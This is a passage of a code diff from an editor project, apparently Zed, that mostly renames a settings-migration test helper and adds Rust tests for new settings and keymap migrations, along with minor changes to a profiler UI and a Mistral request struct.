assert_migrate_settings_with_migrations( + fn assert_migrate_with_migrations( migrations: &[MigrationType], input: &str, output: Option<&str>, @@ -965,7 +985,7 @@ mod tests { #[test] fn test_mcp_settings_migration() { - assert_migrate_settings_with_migrations( + assert_migrate_with_migrations( &[MigrationType::TreeSitter( migrations::m_2025_06_16::SETTINGS_PATTERNS, &SETTINGS_QUERY_2025_06_16, @@ -1154,7 +1174,7 @@ mod tests { } } }"#; - assert_migrate_settings_with_migrations( + assert_migrate_with_migrations( &[MigrationType::TreeSitter( migrations::m_2025_06_16::SETTINGS_PATTERNS, &SETTINGS_QUERY_2025_06_16, @@ -1166,7 +1186,7 @@ mod tests { #[test] fn test_custom_agent_server_settings_migration() { - assert_migrate_settings_with_migrations( + assert_migrate_with_migrations( &[MigrationType::TreeSitter( migrations::m_2025_11_20::SETTINGS_PATTERNS, &SETTINGS_QUERY_2025_11_20, @@ -1382,7 +1402,7 @@ mod tests { #[test] fn test_flatten_code_action_formatters_basic_array() { - assert_migrate_settings_with_migrations( + assert_migrate_with_migrations( &[MigrationType::Json( migrations::m_2025_10_01::flatten_code_actions_formatters, )], @@ -1416,7 +1436,7 @@ mod tests { #[test] fn test_flatten_code_action_formatters_basic_object() { - assert_migrate_settings_with_migrations( + assert_migrate_with_migrations( &[MigrationType::Json( migrations::m_2025_10_01::flatten_code_actions_formatters, )], @@ -1573,7 +1593,7 @@ mod tests { #[test] fn test_flatten_code_action_formatters_array_with_multiple_action_blocks_in_defaults_and_multiple_languages() { - assert_migrate_settings_with_migrations( + assert_migrate_with_migrations( &[MigrationType::Json( migrations::m_2025_10_01::flatten_code_actions_formatters, )], @@ -1699,7 +1719,7 @@ mod tests { #[test] fn test_flatten_code_action_formatters_array_with_format_on_save_and_multiple_languages() { - assert_migrate_settings_with_migrations( + assert_migrate_with_migrations( &[MigrationType::Json( migrations::m_2025_10_01::flatten_code_actions_formatters, )], @@ -1886,7 +1906,7 @@ mod tests { #[test] fn test_format_on_save_formatter_migration_basic() { - assert_migrate_settings_with_migrations( + assert_migrate_with_migrations( &[MigrationType::Json( migrations::m_2025_10_02::remove_formatters_on_save, )], @@ -1906,7 +1926,7 @@ mod tests { #[test] fn test_format_on_save_formatter_migration_array() { - assert_migrate_settings_with_migrations( + assert_migrate_with_migrations( &[MigrationType::Json( migrations::m_2025_10_02::remove_formatters_on_save, )], @@ -1931,7 +1951,7 @@ mod tests { #[test] fn test_format_on_save_on_off_unchanged() { - assert_migrate_settings_with_migrations( + assert_migrate_with_migrations( &[MigrationType::Json( migrations::m_2025_10_02::remove_formatters_on_save, )], @@ -1942,7 +1962,7 @@ mod tests { None, ); - assert_migrate_settings_with_migrations( + assert_migrate_with_migrations( &[MigrationType::Json( migrations::m_2025_10_02::remove_formatters_on_save, )], @@ -1956,7 +1976,7 @@ mod tests { #[test] fn test_format_on_save_formatter_migration_in_languages() { - assert_migrate_settings_with_migrations( + assert_migrate_with_migrations( &[MigrationType::Json( migrations::m_2025_10_02::remove_formatters_on_save, )], @@ -1994,7 +2014,7 @@ mod tests { #[test] fn test_format_on_save_formatter_migration_mixed_global_and_languages() { - assert_migrate_settings_with_migrations( + assert_migrate_with_migrations( &[MigrationType::Json( migrations::m_2025_10_02::remove_formatters_on_save, )], @@ -2031,7 +2051,7 @@ mod tests { #[test] fn test_format_on_save_no_migration_when_no_format_on_save() { - assert_migrate_settings_with_migrations( + assert_migrate_with_migrations( &[MigrationType::Json( migrations::m_2025_10_02::remove_formatters_on_save, )], @@ -2045,7 +2065,7 @@ mod tests { #[test] fn test_restore_code_actions_on_format() { - assert_migrate_settings_with_migrations( + assert_migrate_with_migrations( &[MigrationType::Json( migrations::m_2025_10_16::restore_code_actions_on_format, )], @@ -2066,7 +2086,7 @@ mod tests { ), ); - assert_migrate_settings_with_migrations( + assert_migrate_with_migrations( &[MigrationType::Json( migrations::m_2025_10_16::restore_code_actions_on_format, )], @@ -2080,7 +2100,7 @@ mod tests { None, ); - assert_migrate_settings_with_migrations( + assert_migrate_with_migrations( &[MigrationType::Json( migrations::m_2025_10_16::restore_code_actions_on_format, )], @@ -2107,7 +2127,7 @@ mod tests { ), ); - assert_migrate_settings_with_migrations( + assert_migrate_with_migrations( &[MigrationType::Json( migrations::m_2025_10_16::restore_code_actions_on_format, )], @@ -2136,7 +2156,7 @@ mod tests { ), ); - assert_migrate_settings_with_migrations( + assert_migrate_with_migrations( &[MigrationType::Json( migrations::m_2025_10_16::restore_code_actions_on_format, )], @@ -2154,7 +2174,7 @@ mod tests { #[test] fn test_make_file_finder_include_ignored_an_enum() { - assert_migrate_settings_with_migrations( + assert_migrate_with_migrations( &[MigrationType::Json( migrations::m_2025_10_17::make_file_finder_include_ignored_an_enum, )], @@ -2162,7 +2182,7 @@ mod tests { None, ); - assert_migrate_settings_with_migrations( + assert_migrate_with_migrations( &[MigrationType::Json( migrations::m_2025_10_17::make_file_finder_include_ignored_an_enum, )], @@ -2182,7 +2202,7 @@ mod tests { ), ); - assert_migrate_settings_with_migrations( + assert_migrate_with_migrations( &[MigrationType::Json( migrations::m_2025_10_17::make_file_finder_include_ignored_an_enum, )], @@ -2202,7 +2222,7 @@ mod tests { ), ); - assert_migrate_settings_with_migrations( + assert_migrate_with_migrations( &[MigrationType::Json( migrations::m_2025_10_17::make_file_finder_include_ignored_an_enum, )], @@ -2223,7 +2243,7 @@ mod tests { ); // Platform key: settings nested inside "linux" should be migrated - assert_migrate_settings_with_migrations( + assert_migrate_with_migrations( &[MigrationType::Json( migrations::m_2025_10_17::make_file_finder_include_ignored_an_enum, )], @@ -2252,7 +2272,7 @@ mod tests { ); // Profile: settings nested inside profiles should be migrated - assert_migrate_settings_with_migrations( + assert_migrate_with_migrations( &[MigrationType::Json( migrations::m_2025_10_17::make_file_finder_include_ignored_an_enum, )], @@ -2287,7 +2307,7 @@ mod tests { #[test] fn test_make_relative_line_numbers_an_enum() { - assert_migrate_settings_with_migrations( + assert_migrate_with_migrations( &[MigrationType::Json( migrations::m_2025_10_21::make_relative_line_numbers_an_enum, )], @@ -2295,7 +2315,7 @@ mod tests { None, ); - assert_migrate_settings_with_migrations( + assert_migrate_with_migrations( &[MigrationType::Json( migrations::m_2025_10_21::make_relative_line_numbers_an_enum, )], @@ -2311,7 +2331,7 @@ mod tests { ), ); - assert_migrate_settings_with_migrations( + assert_migrate_with_migrations( &[MigrationType::Json( migrations::m_2025_10_21::make_relative_line_numbers_an_enum, )], @@ -2328,7 +2348,7 @@ mod tests { ); // Platform key: settings nested inside "macos" should be migrated - assert_migrate_settings_with_migrations( + assert_migrate_with_migrations( &[MigrationType::Json( migrations::m_2025_10_21::make_relative_line_numbers_an_enum, )], @@ -2353,7 +2373,7 @@ mod tests { ); // Profile: settings nested inside profiles should be migrated - assert_migrate_settings_with_migrations( + assert_migrate_with_migrations( &[MigrationType::Json( migrations::m_2025_10_21::make_relative_line_numbers_an_enum, )], @@ -2382,6 +2402,132 @@ mod tests { ); } + #[test] + fn test_make_play_sound_when_agent_done_an_enum() { + assert_migrate_with_migrations( + &[MigrationType::Json( + migrations::m_2026_03_30::make_play_sound_when_agent_done_an_enum, + )], + &r#"{ }"#.unindent(), + None, + ); + + assert_migrate_with_migrations( + &[MigrationType::Json( + migrations::m_2026_03_30::make_play_sound_when_agent_done_an_enum, + )], + &r#"{ + "agent": { + "play_sound_when_agent_done": true + } + }"# + .unindent(), + Some( + &r#"{ + "agent": { + "play_sound_when_agent_done": "always" + } + }"# + .unindent(), + ), + ); + + assert_migrate_with_migrations( + &[MigrationType::Json( + migrations::m_2026_03_30::make_play_sound_when_agent_done_an_enum, + )], + &r#"{ + "agent": { + "play_sound_when_agent_done": false + } + }"# + .unindent(), + Some( + &r#"{ + "agent": { + "play_sound_when_agent_done": "never" + } + }"# + .unindent(), + ), + ); + + assert_migrate_with_migrations( + &[MigrationType::Json( + migrations::m_2026_03_30::make_play_sound_when_agent_done_an_enum, + )], + &r#"{ + "agent": { + "play_sound_when_agent_done": "when_hidden" + } + }"# + .unindent(), + None, + ); + + // Platform key: settings nested inside "macos" should be migrated + assert_migrate_with_migrations( + &[MigrationType::Json( + migrations::m_2026_03_30::make_play_sound_when_agent_done_an_enum, + )], + &r#" + { + "macos": { + "agent": { + "play_sound_when_agent_done": true + } + } + } + "# + .unindent(), + Some( + &r#" + { + "macos": { + "agent": { + "play_sound_when_agent_done": "always" + } + } + } + "# + .unindent(), + ), + ); + + // Profile: settings nested inside profiles should be migrated + assert_migrate_with_migrations( + &[MigrationType::Json( + migrations::m_2026_03_30::make_play_sound_when_agent_done_an_enum, + )], + &r#" + { + "profiles": { + "work": { + "agent": { + "play_sound_when_agent_done": false + } + } + } + } + "# + .unindent(), + Some( + &r#" + { + "profiles": { + "work": { + "agent": { + "play_sound_when_agent_done": "never" + } + } + } + } + "# + .unindent(), + ), + ); + } + #[test] fn test_remove_context_server_source() { assert_migrate_settings( @@ -2430,7 +2576,7 @@ mod tests { ); // Platform key: settings nested inside "linux" should be migrated - assert_migrate_settings_with_migrations( + assert_migrate_with_migrations( &[MigrationType::Json( migrations::m_2025_11_25::remove_context_server_source, )], @@ -2468,7 +2614,7 @@ mod tests { ); // Profile: settings nested inside profiles should be migrated - assert_migrate_settings_with_migrations( + assert_migrate_with_migrations( &[MigrationType::Json( migrations::m_2025_11_25::remove_context_server_source, )], @@ -2606,9 +2752,94 @@ mod tests { ); } + #[test] + fn test_make_auto_indent_an_enum() { + // Empty settings should not change + assert_migrate_with_migrations( + &[MigrationType::Json( + migrations::m_2025_01_27::make_auto_indent_an_enum, + )], + &r#"{ }"#.unindent(), + None, + ); + + // true should become "syntax_aware" + assert_migrate_with_migrations( + &[MigrationType::Json( + migrations::m_2025_01_27::make_auto_indent_an_enum, + )], + &r#"{ + "auto_indent": true + }"# + .unindent(), + Some( + &r#"{ + "auto_indent": "syntax_aware" + }"# + .unindent(), + ), + ); + + // false should become "none" + assert_migrate_with_migrations( + &[MigrationType::Json( + migrations::m_2025_01_27::make_auto_indent_an_enum, + )], + &r#"{ + "auto_indent": false + }"# + .unindent(), + Some( + &r#"{ + "auto_indent": "none" + }"# + .unindent(), + ), + ); + + // Already valid enum values should not change + assert_migrate_with_migrations( + &[MigrationType::Json( + migrations::m_2025_01_27::make_auto_indent_an_enum, + )], + &r#"{ + "auto_indent": "preserve_indent" + }"# + .unindent(), + None, + ); + + // Should also work inside languages + assert_migrate_with_migrations( + &[MigrationType::Json( + migrations::m_2025_01_27::make_auto_indent_an_enum, + )], + &r#"{ + "auto_indent": true, + "languages": { + "Python": { + "auto_indent": false + } + } + }"# + .unindent(), + Some( + &r#"{ + "auto_indent": "syntax_aware", + "languages": { + "Python": { + "auto_indent": "none" + } + } + }"# + .unindent(), + ), + ); + } + #[test] fn test_move_edit_prediction_provider_to_edit_predictions() { - assert_migrate_settings_with_migrations( + assert_migrate_with_migrations( &[MigrationType::Json( migrations::m_2026_02_02::move_edit_prediction_provider_to_edit_predictions, )], @@ -2616,7 +2847,7 @@ mod tests { None, ); - assert_migrate_settings_with_migrations( + assert_migrate_with_migrations( &[MigrationType::Json( migrations::m_2026_02_02::move_edit_prediction_provider_to_edit_predictions, )], @@ -2640,7 +2871,7 @@ mod tests { ), ); - assert_migrate_settings_with_migrations( + assert_migrate_with_migrations( &[MigrationType::Json( migrations::m_2026_02_02::move_edit_prediction_provider_to_edit_predictions, )], @@ -2668,7 +2899,7 @@ mod tests { ), ); - assert_migrate_settings_with_migrations( + assert_migrate_with_migrations( &[MigrationType::Json( migrations::m_2026_02_02::move_edit_prediction_provider_to_edit_predictions, )], @@ -2695,7 +2926,7 @@ mod tests { ), ); - assert_migrate_settings_with_migrations( + assert_migrate_with_migrations( &[MigrationType::Json( migrations::m_2026_02_02::move_edit_prediction_provider_to_edit_predictions, )], @@ -2712,7 +2943,7 @@ mod tests { // Non-object edit_predictions (e.g. true) should gracefully skip // instead of bail!-ing and aborting the entire migration chain. - assert_migrate_settings_with_migrations( + assert_migrate_with_migrations( &[MigrationType::Json( migrations::m_2026_02_02::move_edit_prediction_provider_to_edit_predictions, )], @@ -2736,7 +2967,7 @@ mod tests { ); // Platform key: settings nested inside "macos" should be migrated - assert_migrate_settings_with_migrations( + assert_migrate_with_migrations( &[MigrationType::Json( migrations::m_2026_02_02::move_edit_prediction_provider_to_edit_predictions, )], @@ -2765,7 +2996,7 @@ mod tests { ); // Profile: settings nested inside profiles should be migrated - assert_migrate_settings_with_migrations( + assert_migrate_with_migrations( &[MigrationType::Json( migrations::m_2026_02_02::move_edit_prediction_provider_to_edit_predictions, )], @@ -2798,7 +3029,7 @@ mod tests { ); // Combined: root + platform + profile should all be migrated simultaneously - assert_migrate_settings_with_migrations( + assert_migrate_with_migrations( &[MigrationType::Json( migrations::m_2026_02_02::move_edit_prediction_provider_to_edit_predictions, )], @@ -2849,7 +3080,7 @@ mod tests { #[test] fn test_migrate_experimental_sweep_mercury() { - assert_migrate_settings_with_migrations( + assert_migrate_with_migrations( &[MigrationType::Json( migrations::m_2026_02_03::migrate_experimental_sweep_mercury, )], @@ -2857,7 +3088,7 @@ mod tests { None, ); - assert_migrate_settings_with_migrations( + assert_migrate_with_migrations( &[MigrationType::Json( migrations::m_2026_02_03::migrate_experimental_sweep_mercury, )], @@ -2883,7 +3114,7 @@ mod tests { ), ); - assert_migrate_settings_with_migrations( + assert_migrate_with_migrations( &[MigrationType::Json( migrations::m_2026_02_03::migrate_experimental_sweep_mercury, )], @@ -2909,7 +3140,7 @@ mod tests { ), ); - assert_migrate_settings_with_migrations( + assert_migrate_with_migrations( &[MigrationType::Json( migrations::m_2026_02_03::migrate_experimental_sweep_mercury, )], @@ -2935,7 +3166,7 @@ mod tests { ), ); - assert_migrate_settings_with_migrations( + assert_migrate_with_migrations( &[MigrationType::Json( migrations::m_2026_02_03::migrate_experimental_sweep_mercury, )], @@ -2950,7 +3181,7 @@ mod tests { None, ); - assert_migrate_settings_with_migrations( + assert_migrate_with_migrations( &[MigrationType::Json( migrations::m_2026_02_03::migrate_experimental_sweep_mercury, )], @@ -2968,7 +3199,7 @@ mod tests { ); // Platform key: settings nested inside "linux" should be migrated - assert_migrate_settings_with_migrations( + assert_migrate_with_migrations( &[MigrationType::Json( migrations::m_2026_02_03::migrate_experimental_sweep_mercury, )], @@ -2999,7 +3230,7 @@ mod tests { ); // Profile: settings nested inside profiles should be migrated - assert_migrate_settings_with_migrations( + assert_migrate_with_migrations( &[MigrationType::Json( migrations::m_2026_02_03::migrate_experimental_sweep_mercury, )], @@ -3034,7 +3265,7 @@ mod tests { ); // Combined: root + platform + profile should all be migrated simultaneously - assert_migrate_settings_with_migrations( + assert_migrate_with_migrations( &[MigrationType::Json( migrations::m_2026_02_03::migrate_experimental_sweep_mercury, )], @@ -3092,7 +3323,7 @@ mod tests { #[test] fn test_migrate_always_allow_tool_actions_to_default() { // No agent settings - no change - assert_migrate_settings_with_migrations( + assert_migrate_with_migrations( &[MigrationType::Json( migrations::m_2026_02_04::migrate_tool_permission_defaults, )], @@ -3101,7 +3332,7 @@ mod tests { ); // always_allow_tool_actions: true -> tool_permissions.default: "allow" - assert_migrate_settings_with_migrations( + assert_migrate_with_migrations( &[MigrationType::Json( migrations::m_2026_02_04::migrate_tool_permission_defaults, )], @@ -3128,7 +3359,7 @@ mod tests { ); // always_allow_tool_actions: false -> just remove it - assert_migrate_settings_with_migrations( + assert_migrate_with_migrations( &[MigrationType::Json( migrations::m_2026_02_04::migrate_tool_permission_defaults, )], @@ -3147,7 +3378,7 @@ mod tests { ); // Preserve existing tool_permissions.tools when migrating - assert_migrate_settings_with_migrations( + assert_migrate_with_migrations( &[MigrationType::Json( migrations::m_2026_02_04::migrate_tool_permission_defaults, )], @@ -3186,7 +3417,7 @@ mod tests { ); // Don't override existing default (and migrate default_mode to default) - assert_migrate_settings_with_migrations( + assert_migrate_with_migrations( &[MigrationType::Json( migrations::m_2026_02_04::migrate_tool_permission_defaults, )], @@ -3216,7 +3447,7 @@ mod tests { ); // Migrate existing default_mode to default (no always_allow_tool_actions) - assert_migrate_settings_with_migrations( + assert_migrate_with_migrations( &[MigrationType::Json( migrations::m_2026_02_04::migrate_tool_permission_defaults, )], @@ -3245,7 +3476,7 @@ mod tests { ); // No migration needed if already using new format with "default" - assert_migrate_settings_with_migrations( + assert_migrate_with_migrations( &[MigrationType::Json( migrations::m_2026_02_04::migrate_tool_permission_defaults, )], @@ -3263,7 +3494,7 @@ mod tests { ); // Migrate default_mode to default in tool-specific rules - assert_migrate_settings_with_migrations( + assert_migrate_with_migrations( &[MigrationType::Json( migrations::m_2026_02_04::migrate_tool_permission_defaults, )], @@ -3302,7 +3533,7 @@ mod tests { ); // When tool_permissions is null, replace it so always_allow is preserved - assert_migrate_settings_with_migrations( + assert_migrate_with_migrations( &[MigrationType::Json( migrations::m_2026_02_04::migrate_tool_permission_defaults, )], @@ -3330,7 +3561,7 @@ mod tests { ); // Platform-specific agent migration - assert_migrate_settings_with_migrations( + assert_migrate_with_migrations( &[MigrationType::Json( migrations::m_2026_02_04::migrate_tool_permission_defaults, )], @@ -3361,7 +3592,7 @@ mod tests { ); // Channel-specific agent migration - assert_migrate_settings_with_migrations( + assert_migrate_with_migrations( &[MigrationType::Json( migrations::m_2026_02_04::migrate_tool_permission_defaults, )], @@ -3402,7 +3633,7 @@ mod tests { ); // Profile-level migration - assert_migrate_settings_with_migrations( + assert_migrate_with_migrations( &[MigrationType::Json( migrations::m_2026_02_04::migrate_tool_permission_defaults, )], @@ -3440,7 +3671,7 @@ mod tests { ); // Platform-specific agent with profiles - assert_migrate_settings_with_migrations( + assert_migrate_with_migrations( &[MigrationType::Json( migrations::m_2026_02_04::migrate_tool_permission_defaults, )], @@ -3485,7 +3716,7 @@ mod tests { ); // Root-level profile with always_allow_tool_actions - assert_migrate_settings_with_migrations( + assert_migrate_with_migrations( &[MigrationType::Json( migrations::m_2026_02_04::migrate_tool_permission_defaults, )], @@ -3520,7 +3751,7 @@ mod tests { ); // Root-level profile with default_mode - assert_migrate_settings_with_migrations( + assert_migrate_with_migrations( &[MigrationType::Json( migrations::m_2026_02_04::migrate_tool_permission_defaults, )], @@ -3557,7 +3788,7 @@ mod tests { ); // Root-level profile + root-level agent both migrated - assert_migrate_settings_with_migrations( + assert_migrate_with_migrations( &[MigrationType::Json( migrations::m_2026_02_04::migrate_tool_permission_defaults, )], @@ -3603,7 +3834,7 @@ mod tests { // Non-boolean always_allow_tool_actions (string "true") is left in place // so the schema validator can report it, rather than silently dropping user data. - assert_migrate_settings_with_migrations( + assert_migrate_with_migrations( &[MigrationType::Json( migrations::m_2026_02_04::migrate_tool_permission_defaults, )], @@ -3619,7 +3850,7 @@ mod tests { ); // null always_allow_tool_actions is removed (treated as false) - assert_migrate_settings_with_migrations( + assert_migrate_with_migrations( &[MigrationType::Json( migrations::m_2026_02_04::migrate_tool_permission_defaults, )], @@ -3636,7 +3867,7 @@ mod tests { // Project-local settings (.zed/settings.json) with always_allow_tool_actions // These files have no platform/channel overrides or root-level profiles. - assert_migrate_settings_with_migrations( + assert_migrate_with_migrations( &[MigrationType::Json( migrations::m_2026_02_04::migrate_tool_permission_defaults, )], @@ -3677,7 +3908,7 @@ mod tests { ); // Project-local settings with only default_mode (no always_allow_tool_actions) - assert_migrate_settings_with_migrations( + assert_migrate_with_migrations( &[MigrationType::Json( migrations::m_2026_02_04::migrate_tool_permission_defaults, )], @@ -3706,7 +3937,7 @@ mod tests { ); // Project-local settings with no agent section at all - no change - assert_migrate_settings_with_migrations( + assert_migrate_with_migrations( &[MigrationType::Json( migrations::m_2026_02_04::migrate_tool_permission_defaults, )], @@ -3721,7 +3952,7 @@ mod tests { ); // Existing agent_servers are left untouched - assert_migrate_settings_with_migrations( + assert_migrate_with_migrations( &[MigrationType::Json( migrations::m_2026_02_04::migrate_tool_permission_defaults, )], @@ -3764,7 +3995,7 @@ mod tests { ); // Existing agent_servers are left untouched even with partial entries - assert_migrate_settings_with_migrations( + assert_migrate_with_migrations( &[MigrationType::Json( migrations::m_2026_02_04::migrate_tool_permission_defaults, )], @@ -3801,7 +4032,7 @@ mod tests { ); // always_allow_tool_actions: false leaves agent_servers untouched - assert_migrate_settings_with_migrations( + assert_migrate_with_migrations( &[MigrationType::Json( migrations::m_2026_02_04::migrate_tool_permission_defaults, )], @@ -3824,7 +4055,7 @@ mod tests { #[test] fn test_migrate_builtin_agent_servers_to_registry_simple() { - assert_migrate_settings_with_migrations( + assert_migrate_with_migrations( &[MigrationType::Json( migrations::m_2026_02_25::migrate_builtin_agent_servers_to_registry, )], @@ -3864,7 +4095,7 @@ mod tests { #[test] fn test_migrate_builtin_agent_servers_empty_entries() { - assert_migrate_settings_with_migrations( + assert_migrate_with_migrations( &[MigrationType::Json( migrations::m_2026_02_25::migrate_builtin_agent_servers_to_registry, )], @@ -3895,7 +4126,7 @@ mod tests { #[test] fn test_migrate_builtin_agent_servers_with_command() { - assert_migrate_settings_with_migrations( + assert_migrate_with_migrations( &[MigrationType::Json( migrations::m_2026_02_25::migrate_builtin_agent_servers_to_registry, )], @@ -3933,7 +4164,7 @@ mod tests { #[test] fn test_migrate_builtin_agent_servers_gemini_with_command() { - assert_migrate_settings_with_migrations( + assert_migrate_with_migrations( &[MigrationType::Json( migrations::m_2026_02_25::migrate_builtin_agent_servers_to_registry, )], @@ -3961,7 +4192,7 @@ mod tests { #[test] fn test_migrate_builtin_agent_servers_gemini_ignore_system_version_false() { - assert_migrate_settings_with_migrations( + assert_migrate_with_migrations( &[MigrationType::Json( migrations::m_2026_02_25::migrate_builtin_agent_servers_to_registry, )], @@ -3989,7 +4220,7 @@ mod tests { #[test] fn test_migrate_builtin_agent_servers_gemini_ignore_system_version_true() { - assert_migrate_settings_with_migrations( + assert_migrate_with_migrations( &[MigrationType::Json( migrations::m_2026_02_25::migrate_builtin_agent_servers_to_registry, )], @@ -4016,7 +4247,7 @@ mod tests { #[test] fn test_migrate_builtin_agent_servers_already_typed_unchanged() { - assert_migrate_settings_with_migrations( + assert_migrate_with_migrations( &[MigrationType::Json( migrations::m_2026_02_25::migrate_builtin_agent_servers_to_registry, )], @@ -4038,7 +4269,7 @@ mod tests { #[test] fn test_migrate_builtin_agent_servers_preserves_custom_entries() { - assert_migrate_settings_with_migrations( + assert_migrate_with_migrations( &[MigrationType::Json( migrations::m_2026_02_25::migrate_builtin_agent_servers_to_registry, )], @@ -4072,7 +4303,7 @@ mod tests { #[test] fn test_migrate_builtin_agent_servers_target_already_exists() { - assert_migrate_settings_with_migrations( + assert_migrate_with_migrations( &[MigrationType::Json( migrations::m_2026_02_25::migrate_builtin_agent_servers_to_registry, )], @@ -4102,7 +4333,7 @@ mod tests { #[test] fn test_migrate_builtin_agent_servers_no_agent_servers_key() { - assert_migrate_settings_with_migrations( + assert_migrate_with_migrations( &[MigrationType::Json( migrations::m_2026_02_25::migrate_builtin_agent_servers_to_registry, )], @@ -4117,7 +4348,7 @@ mod tests { #[test] fn test_migrate_builtin_agent_servers_all_fields() { - assert_migrate_settings_with_migrations( + assert_migrate_with_migrations( &[MigrationType::Json( migrations::m_2026_02_25::migrate_builtin_agent_servers_to_registry, )], @@ -4165,7 +4396,7 @@ mod tests { #[test] fn test_migrate_builtin_agent_servers_codex_with_command() { - assert_migrate_settings_with_migrations( + assert_migrate_with_migrations( &[MigrationType::Json( migrations::m_2026_02_25::migrate_builtin_agent_servers_to_registry, )], @@ -4197,7 +4428,7 @@ mod tests { #[test] fn test_migrate_builtin_agent_servers_mixed_migrated_and_not() { - assert_migrate_settings_with_migrations( + assert_migrate_with_migrations( &[MigrationType::Json( migrations::m_2026_02_25::migrate_builtin_agent_servers_to_registry, )], @@ -4232,4 +4463,223 @@ mod tests { ), ); } + + #[test] + fn test_migrate_edit_prediction_conflict_context() { + assert_migrate_with_migrations( + &[MigrationType::TreeSitter( + migrations::m_2026_03_23::KEYMAP_PATTERNS, + &KEYMAP_QUERY_2026_03_23, + )], + &r#" + [ + { + "context": "Editor && edit_prediction_conflict", + "bindings": { + "ctrl-enter": "editor::AcceptEditPrediction" // Example of a modified keybinding + } + } + ] + "#.unindent(), + Some( + &r#" + [ + { + "context": "Editor && (edit_prediction && (showing_completions || in_leading_whitespace))", + "bindings": { + "ctrl-enter": "editor::AcceptEditPrediction" // Example of a modified keybinding + } + } + ] + "#.unindent(), + ), + ); + + assert_migrate_with_migrations( + &[MigrationType::TreeSitter( + migrations::m_2026_03_23::KEYMAP_PATTERNS, + &KEYMAP_QUERY_2026_03_23, + )], + &r#" + [ + { + "context": "Editor && edit_prediction_conflict && !showing_completions", + "bindings": { + // Here we don't require a modifier unless there's a language server completion + "tab": "editor::AcceptEditPrediction" + } + } + ] + "#.unindent(), + Some( + &r#" + [ + { + "context": "Editor && (edit_prediction && in_leading_whitespace)", + "bindings": { + // Here we don't require a modifier unless there's a language server completion + "tab": "editor::AcceptEditPrediction" + } + } + ] + "#.unindent(), + ), + ); + + assert_migrate_with_migrations( + &[MigrationType::TreeSitter( + migrations::m_2026_03_23::KEYMAP_PATTERNS, + &KEYMAP_QUERY_2026_03_23, + )], + &r#" + [ + { + "context": "Editor && edit_prediction_conflict && showing_completions", + "bindings": { + "tab": "editor::AcceptEditPrediction" + } + } + ] + "# + .unindent(), + Some( + &r#" + [ + { + "context": "Editor && (edit_prediction && showing_completions)", + "bindings": { + "tab": "editor::AcceptEditPrediction" + } + } + ] + "# + .unindent(), + ), + ); + + assert_migrate_with_migrations( + &[MigrationType::TreeSitter( + migrations::m_2026_03_23::KEYMAP_PATTERNS, + &KEYMAP_QUERY_2026_03_23, + )], + &r#" + [ + { + "context": "Editor && edit_prediction", + "bindings": { + "tab": "editor::AcceptEditPrediction", + // Optional: This makes the default `alt-l` binding do nothing. + "alt-l": null + } + }, + { + "context": "Editor && edit_prediction_conflict", + "bindings": { + "alt-tab": "editor::AcceptEditPrediction", + // Optional: This makes the default `alt-l` binding do nothing. + "alt-l": null + } + }, + ] + "# + .unindent(), + Some( + &r#" + [ + { + "context": "Editor && edit_prediction", + "bindings": { + "tab": "editor::AcceptEditPrediction", + // Optional: This makes the default `alt-l` binding do nothing. + "alt-l": null + } + }, + { + "context": "Editor && (edit_prediction && (showing_completions || in_leading_whitespace))", + "bindings": { + "alt-tab": "editor::AcceptEditPrediction", + // Optional: This makes the default `alt-l` binding do nothing. + "alt-l": null + } + }, + ] + "# + .unindent(), + ), + ); + } + + #[test] + fn test_restructure_profiles_with_settings_key() { + assert_migrate_settings( + &r#" + { + "buffer_font_size": 14, + "profiles": { + "Presenting": { + "buffer_font_size": 20, + "theme": "One Light" + }, + "Minimal": { + "vim_mode": true + } + } + } + "# + .unindent(), + Some( + &r#" + { + "buffer_font_size": 14, + "profiles": { + "Presenting": { + "settings": { + "buffer_font_size": 20, + "theme": "One Light" + } + }, + "Minimal": { + "settings": { + "vim_mode": true + } + } + } + } + "# + .unindent(), + ), + ); + } + + #[test] + fn test_restructure_profiles_with_settings_key_already_migrated() { + assert_migrate_settings( + &r#" + { + "profiles": { + "Presenting": { + "settings": { + "buffer_font_size": 20 + } + } + } + } + "# + .unindent(), + None, + ); + } + + #[test] + fn test_restructure_profiles_with_settings_key_no_profiles() { + assert_migrate_settings( + &r#" + { + "buffer_font_size": 14 + } + "# + .unindent(), + None, + ); + } } diff --git a/crates/miniprofiler_ui/Cargo.toml b/crates/miniprofiler_ui/Cargo.toml index 3f48bdfe486da52fc0edb2a1b540b10375d4f995..a8041b8b37cb57148e6dcdcdb8df7f436e52701b 100644 --- a/crates/miniprofiler_ui/Cargo.toml +++ b/crates/miniprofiler_ui/Cargo.toml @@ -14,7 +14,7 @@ path = "src/miniprofiler_ui.rs" [dependencies] gpui.workspace = true rpc.workspace = true -theme.workspace = true +theme_settings.workspace = true zed_actions.workspace = true workspace.workspace = true util.workspace = true diff --git a/crates/miniprofiler_ui/src/miniprofiler_ui.rs b/crates/miniprofiler_ui/src/miniprofiler_ui.rs index 1f95dc3d230e7c50b4960560a96c9007fd77aab8..351d0a68e2660870923a561ac8989559dc9abd7a 100644 --- a/crates/miniprofiler_ui/src/miniprofiler_ui.rs +++ b/crates/miniprofiler_ui/src/miniprofiler_ui.rs @@ -456,7 +456,7 @@ impl Render for ProfilerWindow { window: &mut gpui::Window, cx: &mut gpui::Context, ) -> impl gpui::IntoElement { - let ui_font = theme::setup_ui_font(window, cx); + let ui_font = theme_settings::setup_ui_font(window, cx); if !self.paused { self.poll_timings(cx); window.request_animation_frame(); @@ -464,7 +464,7 @@ impl Render for ProfilerWindow { let scroll_offset = self.scroll_handle.offset(); let max_offset = self.scroll_handle.max_offset(); - self.autoscroll = -scroll_offset.y >= (max_offset.height - px(24.)); + self.autoscroll = -scroll_offset.y >= (max_offset.y - px(24.)); if self.autoscroll { self.scroll_handle.scroll_to_bottom(); } @@ -544,7 +544,7 @@ impl Render for ProfilerWindow { let path = cx.prompt_for_new_path( &active_path, - Some("performance_profile.miniprof"), + Some("performance_profile.miniprof.json"), ); cx.background_spawn(async move { diff --git a/crates/mistral/src/mistral.rs b/crates/mistral/src/mistral.rs index cc9f94304d989c69c3f5a4bd3763704314564a19..0244f904468a5eb3e03b520a2687b31a1168f52b 100644 --- a/crates/mistral/src/mistral.rs +++ b/crates/mistral/src/mistral.rs @@ -233,6 +233,8 @@ pub struct Request { pub messages: Vec, pub stream: bool, #[serde(default, skip_serializing_if = "Option::is_none")] + pub stream_options: Option, + #[serde(default, skip_serializing_if = "Option::is_none")] pub max_tokens: Option, #[serde(default, skip_serializing_if = "Option::is_none")] pub temperature: Option, @@ -246,6 +248,12 @@ pub struct Request { pub tools: Vec, } 